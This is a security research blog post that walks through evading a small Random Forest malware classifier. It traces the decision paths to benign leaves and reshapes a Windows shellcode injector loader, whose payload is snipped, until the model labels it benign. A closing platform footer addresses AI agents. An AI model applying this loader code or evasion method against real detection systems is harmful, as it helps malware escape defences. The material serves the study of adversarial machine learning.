> For the complete documentation index, see [llms.txt](https://steve-s.gitbook.io/0xtriboulet/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://steve-s.gitbook.io/0xtriboulet/artificial-intelligence/hiding-in-the-trees.md).

# Hiding in the Trees

Machine learning components of security products come in many forms and are increasingly relevant to offensive security researchers. In [Evading the Machine](https://steve-s.gitbook.io/0xtriboulet/artificial-intelligence/evading-the-machine) I worked through a basic evasion attack against a logistic regression classifier. In that example we saw that 'the model' is really just a plane inside a three-dimensional space that's described by the 'features' we selected. One of the weaknesses of logistic regressions is that as the number of dimensions increases, the spatial intuition for the model's explainability begins to break down. You cannot for example easily plot and visualize 5 or 6 dimensions, nor can you easily visualize the corresponding hyperplane that represents the decision boundary, and additionally achieving [explainability](https://pmc.ncbi.nlm.nih.gov/articles/PMC7824368/) becomes a challenge. Some solutions exist for these and other problems concerning the [curse of dimensionality](https://en.wikipedia.org/wiki/Curse_of_dimensionality), but we can also mitigate some of those concerns all together by choosing a different machine learning algorithm.

A different and common example of machine learning classifiers are [tree-based algorithms](https://www.omdena.com/blog/tree-based-algorithms-in-machine-learning). Tree-based algorithms like the Random Forest Classifier we'll discuss in this blog offer additional benefits like being highly performant, deterministic, interpretable, and that potentially makes them a valuable capability in security products. In this blog we'll work through the construction of a simple Random Forest classifier, and examine the differences in the intuition required to achieve an evasion attack on these models.\
\
The complete code and graphics for this blog are available in the [repository](https://github.com/0xTriboulet/hiding_in_the_trees).

## Building a Random Forest Classifier

For this example I reused the data from [Evading the Machine](https://steve-s.gitbook.io/0xtriboulet/artificial-intelligence/evading-the-machine), and jumped right into building the classifier. The [scikit-learn](https://scikit-learn.org/stable/) library provides a convenient implementation of Random Forests that we can use for this example.

{% code title="train\_random\_forest.py" %}

```python
# Load dataset
try:
    df = pd.read_csv("pe_features.csv")
except FileNotFoundError:
    print("Error: 'pe_features.csv' not found.")
    return

X = df.drop(columns=["label"])
y = df["label"]

# Convert to numpy arrays to avoid feature name warnings during classification
X = X.values
y = y.values

# Train/test split
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.20, random_state=42
)

print(f"Training on {len(X_train)} samples, testing on {len(X_test)} samples.")

# Initialize and train Random Forest
# n_estimators is the number of trees in the forest
rf_model = RandomForestClassifier(n_estimators=3, random_state=42, min_impurity_decrease=0.001) # min_impurity_decrease was set so I could reuse injector_1.cxx
rf_model.fit(X_train, y_train)
```

{% endcode %}

A Random Forest classifier is an [ensemble of decision trees](https://scikit-learn.org/stable/modules/ensemble.html), each trained on a random subset of the data. The final prediction is made by aggregating the predictions of all the individual trees. This approach helps to reduce over-fitting and improve the model's generalization ability. In the snippet above, we specify that our random forest should be composed of 3 trees. This is for simplicity, but we could increase the number of trees to improve the model's accuracy.

Unlike some model architectures, most tree-based algorithms are not sensitive to the scale of the input features. This means that we don't need to apply and save a separate scaling transformation to the data before training the model.

Once we've implemented the training script above, we can run it and examine how the model performs on the test set.

```bash
Training on 320 samples, testing on 80 samples.

Test Accuracy: 88.75%

Classification Report:
              precision    recall  f1-score   support
           0       0.89      0.86      0.87        36
           1       0.89      0.91      0.90        44
           
    accuracy                           0.89        80
   macro avg       0.89      0.89      0.89        80
weighted avg       0.89      0.89      0.89        80


Model saved to random_forest_model.pkl
```

This model is able to achieve an accuracy of 89%, which is not particularly good but it works well enough for this example.

## Learning About the Classifier

For a Random Forest, the "decision boundary" is complex. It can be described as a series of axis-aligned splits that carve the feature space into hyper-rectangles. But because fundamentally a forest is just a collection of decision trees, we can actually "read" the logic of the classifier by looking at the individual trees.

<figure><img src="/files/Q82aFzm7fXBoVZdeJnXe" alt=""><figcaption></figcaption></figure>

The intuition here is that the model will invoke each of the trees in the forest to make a prediction, and the final prediction is made by aggregating the predictions of all the individual trees. This means that we can navigate the trees to understand the decision boundary of the model, and how a given binary's features are used to make a prediction.

In this example our forest consists of 3 trees, and we can examine the output of each tree individually to assess how a given binary will be classified. To simplify this process, `classify.py` is implemented to take in a path to a binary, and output a trace of the classification path through the trees. For convenience, I'll reuse the injector binary from [Evading the Machine](https://steve-s.gitbook.io/0xtriboulet/artificial-intelligence/evading-the-machine).

{% code title="injector.cxx" %}

```c
// clang injector.cxx -o injector.exe
#include <windows.h>
#include <stdio.h>

UCHAR payload[] = {
...snip...
};


INT main(){
	
	PVOID  pPayload      = NULL;
	HANDLE hThread       = NULL;
	SIZE_T szPayloadSize = sizeof(payload);
	
	pPayload = VirtualAlloc(NULL, szPayloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	RtlCopyMemory(pPayload, payload, szPayloadSize);
	
	hThread  = CreateThread(NULL, 0x0, (LPTHREAD_START_ROUTINE) pPayload, NULL, 0x0, NULL);
	
	WaitForSingleObject(hThread, INFINITE);
	
	return 0;
}
```

{% endcode %}

We build the injector binary using `clang` and then run it through `classify.py` to see how it is classified by the forest. The output shows that the injector binary is classified as malware. This is because the decision path through the forest leads to a leaf node with a distribution (annotated as \[Benign, Malicious]) of \[0. 1.] in `Tree 0`, \[0.03125 0.96875] in `Tree 1`, and \[1. 0.] in `Tree 2`. Note that `Tree 2` actually classified the sample as `Benign`. The mean of the second number in each of those arrays becomes the ensemble's (ie. the forest's) prediction as malware with a probability of `0.6562`.

```bash
(.venv) hiding_in_the_trees>python .\classify.py .\c\injector.exe                                                              
File: injector.exe
Extracted Features:
  - weighted_entropy: 5.5628
  - strings_density: 11.9810
  - log_size: 5.0336
Probability of malware: 0.6562
Classification: MALWARE

Decision Paths across Forest:  # I'm lazy so I'm using Tree 1 because it's the shortest path to a decision
[Tree 0] decision path:
...snip...
  Leaf 35: Distribution [0. 1.]

[Tree 1] decision path:
  Node 0: log_size (5.0336) > 4.5512
  Node 6: log_size (5.0336) <= 5.3869
  Node 7: strings_density (11.9810) > 3.0003
  Node 9: weighted_entropy (5.5628) > 5.4790
  Node 15: strings_density (11.9810) > 10.1599
  Leaf 25: Distribution [0.03125 0.96875]

[Tree 2] decision path:
...snip...
  Leaf 35: Distribution [1. 0.]
```

We can follow this decision path to understand how the classifier makes its predictions in the `.png` available for the forest. By default all left branches are `True`, and all right branches are `False`.

<figure><img src="/files/AxwVRib3ShYxplKkvD9b" alt=""><figcaption></figcaption></figure>

Repeating this process for the other trees in the forest results in a highly interpretable intuition for the decision boundary of the model. However, because there's multiple trees, each with many branches, reversing a set of properties to make the binary benign is not straightforward. The model's decision boundary is complex and requires a deep understanding of the feature space to reverse engineer.

## Evading the Classifier

What we can do now is extract the paths from the Random Forest that result in a `Benign` classification. We can do this by identifying the the output points (ie the Leaf Nodes) in each tree that result in `Benign` classifications, and then reverse engineer the logic of the forest to identify the features that lead to these leaves. We can `AND` together the nodes that lead to the Benign Leaf Nodes to build our intuition for the requisite properties that a binary needs to be classified as benign. A similar technique using classification paths has been used by [CrowdStrike](https://www.crowdstrike.com/en-us/blog/embersim-large-databank-for-similarity-research-in-cybersecurity/) to improve the detection of sample similarities. For our purposes, we care about extracting information from the trees to facilitate the development of an evasive binary. I implemented this logic in `evasive_analysis.py`, and the core logic is below.

{% code title="evasive\_analysis.py (core loop)" %}

```python
for i, estimator in enumerate(rf_model.estimators_):
    print(f"Tree {i}:")
    tree = estimator.tree_

    # Identify all leaf nodes
    children_left = tree.children_left
    children_right = tree.children_right
    feature = tree.feature
    threshold = tree.threshold
    value = tree.value

    # Find leaves where class 0 (Benign) is the majority
    # value[node_id][0] gives the distribution [count_class_0, count_class_1]
    benign_leaf_ids = [
        node_id for node_id in range(tree.node_count)
        if children_left[node_id] == -1 and np.argmax(value[node_id][0]) == 0
    ]

    for leaf_id in benign_leaf_ids:
        # Trace path from leaf back to root
        path_constraints = []
        curr = leaf_id

        while curr != 0:  # 0 is the root node
            # Find parent
            parent = -1
            direction = ""

            # Check if current node is a left or right child of some parent
            for node_id in range(tree.node_count):
                if children_left[node_id] == curr:
                    parent = node_id
                    direction = "<="
                    break
                if children_right[node_id] == curr:
                    parent = node_id
                    direction = ">"
                    break

            fname = feature_names[feature[parent]]
            thresh = threshold[parent]
            path_constraints.append(f"{fname} {direction} {thresh:.4f}")
            curr = parent
```

{% endcode %}

The script will generate a bunch of statements like the one below, broken out by tree. For simplicity, I'll focus on achieving the benign classification for `Tree 0`, but this same technique can, and sometimes *must*, be applied to multiple trees.

```
  [Leaf 34] Path to Benign: weighted_entropy <= 6.2961 AND strings_density > 3.5898 AND weighted_entropy > 4.0754 AND strings_density > 10.0563 AND log_size <= 5.0679 AND log_size <= 5.0572 AND weighted_entropy <= 5.0910
```

And we can either think really hard about how to simplify the logic, or pass it into your favorite large-language model to take a guess. I did the latter and got the following.

```aiignore
[Leaf 34] 4.0754 < weighted_entropy <= 5.0910 AND strings_density > 10.0563 AND log_size <= 5.0572
```

We can then modify our binary so that it fits the properties of our target path to the benign leaf node, and at that point we can expect that the classifier will output a benign label.

{% code title="injector\_1.cxx" %}

```c
// clang .\injector.cxx -o injector_1.exe -nostdlib -lmsvcrt -lkernel32
#include <windows.h>
#include <stdio.h>

__attribute__((section(".text"))) UCHAR payload[] = {
...snip...
};

typedef LPVOID (WINAPI * VirtualAlloc_t)(
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD  flAllocationType,
    DWORD  flProtect
);

typedef HANDLE (WINAPI * CreateThread_t)(
    LPSECURITY_ATTRIBUTES   lpThreadAttributes,
    SIZE_T                  dwStackSize,
    LPTHREAD_START_ROUTINE  lpStartAddress,
    __drv_aliasesMem LPVOID lpParameter,
    DWORD                   dwCreationFlags,
    LPDWORD                 lpThreadId
);

typedef DWORD (WINAPI * WaitForSingleObject_t)(
    HANDLE hHandle,
    DWORD dwMilliseconds
);

INT main(){
	
	PVOID  pPayload      = NULL;
	HANDLE hThread       = NULL;
	SIZE_T szPayloadSize = sizeof(payload);
	
	HMODULE hKernel32                           = NULL;
	
	VirtualAlloc_t        pVirtualAlloc         = NULL;
	CreateThread_t        pCreateThread         = NULL;
	WaitForSingleObject_t pWaitForSingleObject  = NULL;
	
	hKernel32            = GetModuleHandleA("kernel32.dll");
	pVirtualAlloc        = (VirtualAlloc_t) GetProcAddress(hKernel32, "VirtualAlloc");
	pCreateThread        = (CreateThread_t) GetProcAddress(hKernel32, "CreateThread");
	pWaitForSingleObject = (WaitForSingleObject_t) GetProcAddress(hKernel32, "WaitForSingleObject");
	
	pPayload = pVirtualAlloc(NULL, szPayloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	RtlCopyMemory(pPayload, payload, szPayloadSize);
	
	hThread  = pCreateThread(NULL, 0x0, (LPTHREAD_START_ROUTINE) pPayload, NULL, 0x0, NULL);
	
	pWaitForSingleObject(hThread, INFINITE);

	return 0;
}
```

{% endcode %}

For this example I was able to reuse the `injector_1.exe`.

```bash
(.venv) hiding_in_the_trees>python .\classify.py .\c\injector_1.exe
File: injector_1.exe
Extracted Features:
  - weighted_entropy: 4.1983
  - strings_density: 14.1905
  - log_size: 4.0315
```

We see that the `injector_1.exe` has a weighted entropy of `4.1983` (which is between 4.0754 and 5.0910), a strings density of `14.1905` (which is greater than 10.0563), a log size of `4.0315` (which is less than 5.0572) and therefore satisfies our simplified path to `Leaf 34` in `Tree 0`. In this case, these properties also achieve a benign classification for `Tree 2` and therefore a benign label from the forest.

```bash
(.venv) hiding_in_the_trees>python .\classify.py .\c\injector_1.exe
File: injector_1.exe
...snip see above...
Probability of malware: 0.3333
Classification: BENIGN

Decision Paths across Forest:

[Tree 0] decision path:
  Node 0: weighted_entropy (4.1983) <= 6.2961
  Node 1: strings_density (14.1905) > 3.5898
  Node 7: weighted_entropy (4.1983) > 4.0754
  Node 17: strings_density (14.1905) > 10.0563
  Node 31: log_size (4.0315) <= 5.0679
  Node 32: log_size (4.0315) <= 5.0572
  Node 33: weighted_entropy (4.1983) <= 5.0910
  Leaf 34: Distribution [1. 0.]

[Tree 1] decision path:
  Node 0: log_size (4.0315) <= 4.5512
  Node 1: log_size (4.0315) <= 4.5124
  Leaf 2: Distribution [0. 1.]

[Tree 2] decision path:
  Node 0: strings_density (14.1905) > 6.1848
  Node 18: log_size (4.0315) <= 5.5100
  Node 19: weighted_entropy (4.1983) <= 6.4057
  Node 20: strings_density (14.1905) > 9.7186
  Node 34: weighted_entropy (4.1983) <= 6.0355
  Leaf 35: Distribution [1. 0.]
```

## Considerations

This post explored how tree-based models differ from linear classifiers. While a logistic regression offers a single, smooth decision boundary, a Random Forest creates a "jagged" landscape of Boolean logic. We saw that while this complexity can make manual intuition harder, it also makes the model more transparent to programmatic reverse-engineering.

One major consideration is the depth and complexity of the forest. In this example, we used a very shallow forest with only 3 trees. Modern production classifiers may use hundreds of trees and thousands of features (including imports, API call sequences, and byte-level histograms). This creates a massive search space for evasion, where satisfying the "Benign" paths for a majority of trees becomes a significant optimization challenge.

Furthermore, this analysis assumes "White Box" access, where we have knowledge of the features the model is expecting, we have the model file (`.pkl`), and we can inspect the model's internal thresholds. In a more constrained "Black Box" scenario, an attacker can't directly backtrack paths and must instead rely on probing the model with variations of a binary to map out the decision surface indirectly.

## Conclusion

By moving from a simple linear model to a Random Forest, we’ve seen that machine learning evasion is less about "tricking" an AI and more about understanding the specific logical constraints of a data-driven system. We demonstrated that if you can extract the underlying decision paths, you can deterministically derive the exact properties needed to nudge a malicious binary into a benign leaf in the trees (ie. a "hyper rectangle" of the feature space). Again, this intuition offer insights to offensive security practitioners on how to improve their understanding of machine learning features in security products, and (for defenders) how the mechanisms of a classifier can be improved to mitigate the risks of these attacks.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://steve-s.gitbook.io/0xtriboulet/artificial-intelligence/hiding-in-the-trees.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
